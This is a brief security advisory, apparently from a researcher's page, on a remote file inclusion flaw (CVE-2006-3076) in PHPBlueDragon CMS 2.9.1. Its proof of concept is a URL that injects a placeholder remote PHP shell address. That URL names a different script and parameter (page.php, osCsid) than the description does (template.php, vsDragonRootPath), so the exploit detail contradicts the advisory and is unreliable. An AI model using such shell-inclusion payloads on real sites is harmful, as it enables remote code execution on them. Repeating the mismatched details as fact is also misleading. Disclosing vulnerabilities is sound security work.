DEFTCODE( 2 )

GPG - 2048R/6D378CAF

CVE-2006-3076 – PHPBlueDragon CMS 2.9.1 - Remote File Inclusion

Vendor

http://phpbluedragon.net/

PHP Blue Dragon CMS is a web-based content management system implemented in PHP.

Description

PHP remote file inclusion vulnerability in software_upload/public_includes/pub_templates/vphptree/template.php in PHPBlueDragon CMS 2.9.1 allows remote attackers to execute arbitrary PHP code via a URL in the vsDragonRootPath parameter.

Proof of Concept

~ stands for [php-shell-url]

  1. http://localhost/shop/page.php?osCsid= ~

References